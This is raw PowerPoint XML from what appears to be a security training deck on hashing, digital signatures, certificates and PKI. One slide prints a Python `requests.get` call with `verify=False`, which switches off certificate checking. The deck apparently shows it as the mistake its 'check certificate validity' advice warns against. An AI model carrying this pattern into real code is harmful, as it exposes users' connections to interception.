          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hashing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 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78056" y="2667000"/>
            <a:ext cx="1949080" cy="822489"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1203136" y="1932232"/>
            <a:ext cx="1676400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1355536" y="2908968"/>
            <a:ext cx="1371600" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Secret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2727136" y="3078244"/>
            <a:ext cx="1347537"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74673" y="2522701"/>
            <a:ext cx="972442" cy="966788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5047115" y="3078243"/>
            <a:ext cx="1347537"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94651" y="2521034"/>
            <a:ext cx="2079605" cy="1015404"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6950256" y="1932232"/>
            <a:ext cx="1676400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3777928" y="1932811"/>
            <a:ext cx="1676400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Hash Function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2293930" y="3897474"/>
            <a:ext cx="53118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Works in one direction only.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hashed message can’t be restored to cleartext.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{619E6C52-99CD-48B5-9172-C9F539122673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018387" y="5112592"/>
            <a:ext cx="6112571"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sha = hashlib.sha1(b'Hash me!').hexdigest()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2690134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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Digital Signatures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2286000"/>
            <a:ext cx="7835568" cy="2495550"/>
            <a:chOff x="1423156" y="4092575"/>
            <a:chExt cx="6400044" cy="2038350"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Line 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3001962" y="4937125"/>
              <a:ext cx="25336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7" name="Picture 17" descr="D:\content\A+\new icons\user_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1212" y="4092575"/>
              <a:ext cx="110648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descr="D:\content\A+\new icons\user_9.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0675" y="4146550"/>
              <a:ext cx="110648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D:\content\093022\digital signatur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23156" y="4693948"/>
              <a:ext cx="5032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D:\content\093022\Cryptographic.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14600" y="4724400"/>
              <a:ext cx="5032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D:\content\093022\digital signatur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62600" y="4648200"/>
              <a:ext cx="5032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D:\content\093022\Cryptographic.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10375" y="4629150"/>
              <a:ext cx="5032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69"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="6832599" y="5546725"/>
              <a:ext cx="498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4" name="Line 69"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="2533649" y="5556250"/>
              <a:ext cx="498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5" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6346825" y="5645150"/>
              <a:ext cx="1476375" cy="47942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Hash Value Matches</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rounded Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2030412" y="5638800"/>
              <a:ext cx="1476375" cy="49212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Hash Value of Signature</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1595813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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verify sender:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine information source by signing hash/data with private key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If possible to decrypt it with sender’s public key, then sender is verified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non-repudiation = sender can’t deny association with a data transmission.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect private key: if stolen/compromised, you could be accountable for anything digitally signed using that key.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Digital Signature Non-repudiation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226317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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="3060382"/>
            <a:ext cx="8460150" cy="3330892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>Electronic document that associates credentials with public key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>Users and devices can hold certificates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>CA issues:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>Certificate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>Public/private key pair</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>Public key part of certificate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>Private key remains encrypted on hard drive to protect it from disclosure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>Ensure that certificates are signed by a Trusted Root Certification Authority.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0"/>
              <a:t>Ensure your app checks certificate validity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	requests.get(“https://www.example.com”, verify=False)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" kern="0" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Only use self-signed certificates in development or other trusted conditions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" kern="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Digital Certificates (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1888959" y="1164431"/>
            <a:ext cx="1676400" cy="1709738"/>
            <a:chOff x="1981200" y="2819400"/>
            <a:chExt cx="1676400" cy="1709738"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2057400" y="4267200"/>
              <a:ext cx="1549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b="1" dirty="0">
                  <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>User with Certificate</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="user_4.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1200" y="2819400"/>
              <a:ext cx="1365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CTC\LO\Icons\icons\polic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24200" y="3505200"/>
              <a:ext cx="5334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geck.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124200" y="3962401"/>
              <a:ext cx="304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5257800" y="1545431"/>
            <a:ext cx="1689100" cy="1328738"/>
            <a:chOff x="5257800" y="3200400"/>
            <a:chExt cx="1689100" cy="1328738"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5257800" y="4267200"/>
              <a:ext cx="16891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100" b="1" dirty="0">
                  <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                </a:rPr>
                <a:t>Device with Certificate</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11" descr="D:\Google Drive\Administration\LO\NetworkPlus\093012 diagrams\icons\client_computer.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10200" y="3200400"/>
              <a:ext cx="121602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D:\CTC\LO\Icons\icons\polic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0800" y="3505200"/>
              <a:ext cx="5334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cgeck.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16842" y="3957138"/>
              <a:ext cx="304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1130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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Digital Certificates (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Content Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A856AD96-43C3-4581-9C96-924261B6E785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639672" y="1301750"/>
            <a:ext cx="3864657" cy="4921250"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2798171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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PKI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 2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23701" y="4555074"/>
            <a:ext cx="1177427" cy="1086187"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3962400" y="1524000"/>
            <a:ext cx="914400" cy="725487"/>
            <a:chOff x="3962400" y="1524000"/>
            <a:chExt cx="914400" cy="725487"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7"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62400" y="15240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19600" y="1981200"/>
              <a:ext cx="267482"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Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3128634" y="2209799"/>
            <a:ext cx="885636" cy="6250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nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2584845" y="2914250"/>
            <a:ext cx="914400" cy="725487"/>
            <a:chOff x="2819400" y="2895600"/>
            <a:chExt cx="914400" cy="725487"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11"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19400" y="28956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76600" y="3352800"/>
              <a:ext cx="267482"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5634475" y="2914250"/>
            <a:ext cx="914400" cy="725487"/>
            <a:chOff x="5105400" y="2895600"/>
            <a:chExt cx="914400" cy="725487"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14"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05400" y="28956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21569" y="3352800"/>
              <a:ext cx="267482"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Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-4980000" flipH="1">
            <a:off x="4985485" y="1926308"/>
            <a:ext cx="592176" cy="131500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Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3684495" y="2209800"/>
            <a:ext cx="1490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200" b="0" dirty="0"/>
              <a:t>Root CA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2296714" y="3593453"/>
            <a:ext cx="1490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200" b="0" dirty="0"/>
              <a:t>Subordinate CA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5346344" y="3581400"/>
            <a:ext cx="14906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200" b="0" dirty="0"/>
              <a:t>Subordinate CA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-4980000" flipH="1" flipV="1">
            <a:off x="5177099" y="4105407"/>
            <a:ext cx="717834" cy="2189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1" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-4980000" flipH="1">
            <a:off x="6258780" y="3918796"/>
            <a:ext cx="660739" cy="46499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2" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-4980000" flipH="1" flipV="1">
            <a:off x="2284774" y="3998584"/>
            <a:ext cx="715479" cy="42736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679" y="4626278"/>
            <a:ext cx="1134641" cy="1086187"/>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82050" y="4584466"/>
            <a:ext cx="1252900" cy="1169682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2054478" y="4886967"/>
            <a:ext cx="1169634" cy="1314452"/>
            <a:chOff x="2054478" y="4886967"/>
            <a:chExt cx="1169634" cy="1314452"/>
          </a:xfrm>
        </p:grpSpPr>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2803172" y="5305916"/>
              <a:ext cx="567560" cy="274320"/>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2516285" y="5033587"/>
              <a:ext cx="567560" cy="274320"/>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54478" y="5460744"/>
              <a:ext cx="987567" cy="740675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>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6038357" y="5440542"/>
            <a:ext cx="567560" cy="27432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5751470" y="5168213"/>
            <a:ext cx="567560" cy="27432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289663" y="5595370"/>
            <a:ext cx="987567" cy="740675"/>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7994680" y="5305916"/>
            <a:ext cx="567560" cy="27432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a:off x="7707793" y="5033587"/>
            <a:ext cx="567560" cy="274320"/>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45986" y="5460744"/>
            <a:ext cx="987567" cy="740675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1434694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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PKI Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3962400" y="1524000"/>
            <a:ext cx="1219200" cy="969179"/>
            <a:chOff x="3962400" y="1524000"/>
            <a:chExt cx="914400" cy="725487"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 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62400" y="15240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9600" y="1981200"/>
              <a:ext cx="267482"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1684825" y="1597676"/>
            <a:ext cx="567560" cy="27432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1397938" y="1325347"/>
            <a:ext cx="567560" cy="27432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131" y="1752504"/>
            <a:ext cx="987567" cy="740675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2585633" y="3664688"/>
            <a:ext cx="1530171" cy="1137686"/>
            <a:chOff x="4953000" y="3657600"/>
            <a:chExt cx="1530171" cy="1137686"/>
          </a:xfrm>
        </p:grpSpPr>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53000" y="3657600"/>
              <a:ext cx="811028" cy="894517"/>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62600" y="4104858"/>
              <a:ext cx="920571" cy="690428"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
